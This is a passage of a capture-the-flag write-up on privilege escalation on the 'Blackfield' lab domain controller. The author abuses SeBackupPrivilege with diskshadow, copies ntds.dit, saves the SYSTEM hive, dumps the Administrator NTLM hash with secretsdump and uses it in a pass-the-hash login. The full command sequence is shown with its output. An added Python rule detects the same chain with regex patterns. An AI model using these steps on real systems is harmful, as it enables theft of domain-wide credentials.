Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
From the output, these are the interesting entries, and they fit the username svc_backup:
BUILTIN\Backup Operators
SeBackupPrivilege Back up files and directories Enabled
The user svc_backup can back up data because it has SeBackupPrivilege. It took me some time to work out what to do, but a few Google searches saved my time. Since this is an AD domain controller and I have permission to back up anything on the machine, I am going to back up the NTDS.dit file and the SYSTEM registry hive.
The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
Here is a good explanation, from a slide deck, of how this works:
https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
I need to use diskshadow to first create a shadow copy of volume C: under an alias and expose it, so I can read everything from that volume. Here I made a text file, basically a script that executes commands in the diskshadow console:
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias 0xprashant
create
expose %0xprashant% z:
Uploading the script:
*Evil-WinRM* PS C:\temp> upload /home/prashant/0xprashant.txt
Info: Uploading /home/prashant/0xprashant.txt to C:\temp\0xprashant.txt
Data: 124 bytes of 124 bytes copied
Info: Upload successful!
Executing the script:
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/10/2020 3:34:37 PM
-> SET CONTEXT PERSISTENT NOWRITER
SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }
CLIENTACCESSIBLE Specify to create shadow copies usable by client versions of Windows.
PERSISTENT Specify that shadow copy is persist across program exit, reset or reboot.
PERSISTENT NOWRITERS Specify that shadow copy is persistent and all writers are excluded.
VOLATILE Specify that shadow copy will be deleted on exit or reset.
VOLATILE NOWRITERS Specify that shadow copy is volatile and all writers are excluded.
Example: SET CONTEXT CLIENTACCESSIBLE
I got an error like this. It complains about SET CONTEXT PERSISTENT NOWRITER, but in my script it is NOWRITERS, not NOWRITER. Then I figured out that the last character of each line is being dropped before the line is used, so I added an extra dummy character at the end of every line:
➜ prashant cat 0xprashant.txt
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p
Like this.
Running again:
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/10/2020 3:41:15 PM
-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias 0xprashant
-> create
Alias 0xprashant for shadow ID {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9} set as environment variable.
Querying all shadow copies with the shadow copy set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9}
* Shadow copy ID = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} %0xprashant%
- Shadow copy set: {c38f96e5-6d7e-49f8-b605-25b0b25934e9} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/10/2020 3:41:17 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %0xprashant% z:
-> %0xprashant% = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}
The shadow copy was successfully exposed as z:\.
This time it ran smoothly.
Now it's time to copy NTDS.dit. There is a tool on GitHub that does this for me:
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
Upload the two DLL files to the machine and then simply import them:
*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/prashant/SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeUtils.dll
Info: Uploading /home/prashant/SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
Importing the modules:
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll
Copying the NTDS.dit:
*Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/10/2020 3:37 PM 98 0xprashant.txt
-a---- 6/10/2020 3:39 PM 636 2020-06-10_15-39-54_DC01.cab
-a---- 6/10/2020 3:41 PM 627 2020-06-10_15-41-18_DC01.cab
-a---- 6/10/2020 3:51 PM 18874368 ndts.dit
-a---- 6/10/2020 3:46 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 6/10/2020 3:48 PM 16384 SeBackupPrivilegeUtils.dll
And we got it. Now it's time for the SYSTEM hive:
*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
The operation completed successfully.
And download both files:
*Evil-WinRM* PS C:\temp> download system
*Evil-WinRM* PS C:\temp> download ntds.dit
Dumping NTLM hashes from ntds.dit and SYSTEM
Now that I have both files, I can use secretsdump.py to dump the NTLM hashes from them:
➜ blackfield python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
And here we have the NTLM hash of the Administrator user.
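An added detection example for the chain above (not from the original writeup): it matches diskshadow execution, reg save of the SYSTEM hive and any reference to ntds.dit in constructed process-creation (4688) and PowerShell script block (4104) records, and alerts only when one user completes all three stages within an hour. The nightlybackup account and the timestamps are constructed; the other names are the page's own.

```python
"""Detection for the Backup Operators / diskshadow / ntds.dit chain above.

Records are constructed in the shape of Security event 4688 (process
creation with command-line auditing) plus one PowerShell 4104 script
block, because the Copy-FileSeBackupPrivilege cmdlet used on this page
runs inside the WinRM PowerShell host and never appears as a new
process. Each stage on its own can be legitimate (admins do run
diskshadow and "reg save"), so the rule correlates all three stages
per user inside a time window before alerting.
"""
import re
from datetime import datetime, timedelta

STAGES = {
    "shadow_copy": re.compile(r"\bdiskshadow(\.exe)?\b", re.I),
    "hive_save": re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SYSTEM|SAM|SECURITY)\b", re.I),
    "ntds_read": re.compile(r"ntds\.dit|Copy-FileSeBackupPrivilege", re.I),
}
REQUIRED = set(STAGES)
WINDOW = timedelta(hours=1)

# Constructed records: event id, ISO time, SubjectUserName, command line / script text
SAMPLE_RECORDS = [
    {"event": 4688, "time": "2020-06-10T15:34:37", "user": "svc_backup",
     "text": r"diskshadow /s 0xprashant.txt"},
    {"event": 4104, "time": "2020-06-10T15:51:02", "user": "svc_backup",
     "text": r"Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit"},
    {"event": 4688, "time": "2020-06-10T15:53:10", "user": "svc_backup",
     "text": r"reg save HKLM\SYSTEM c:\temp\system"},
    {"event": 4688, "time": "2020-06-10T02:00:00", "user": "nightlybackup",   # constructed scheduled job
     "text": r"diskshadow /s C:\scripts\nightly.dsh"},                         # one stage only, no alert
    {"event": 4688, "time": "2020-06-10T16:10:00", "user": "audit2020",
     "text": r"whoami /all"},
]


def classify(text):
    """Return the set of chain stages one command line / script block matches."""
    return {name for name, rx in STAGES.items() if rx.search(text)}


def correlate(records, window=WINDOW):
    """Alert (user, start time) when one user completes all stages within `window`."""
    by_user = {}
    for r in records:
        stages = classify(r["text"])
        if stages:
            by_user.setdefault(r["user"], []).append((datetime.fromisoformat(r["time"]), stages))
    alerts = []
    for user, hits in by_user.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):       # slide a window forward from each hit
            seen = set()
            for t, stages in hits[i:]:
                if t - start > window:
                    break
                seen |= stages
            if seen >= REQUIRED:
                alerts.append((user, start.isoformat()))
                break                                 # one alert per user is enough
    return alerts


if __name__ == "__main__":
    for user, start in correlate(SAMPLE_RECORDS):
        print(f"ALERT: {user} ran shadow copy + hive save + ntds.dit access from {start}")
```

A real rule would also exclude the identity that runs scheduled backups and raise severity when the subject is a Backup Operators member rather than a Domain Admin.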
Login as administrator
➜ blackfield evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
Got root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
6d1--------------------------f67
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
And we pwned it.
Resources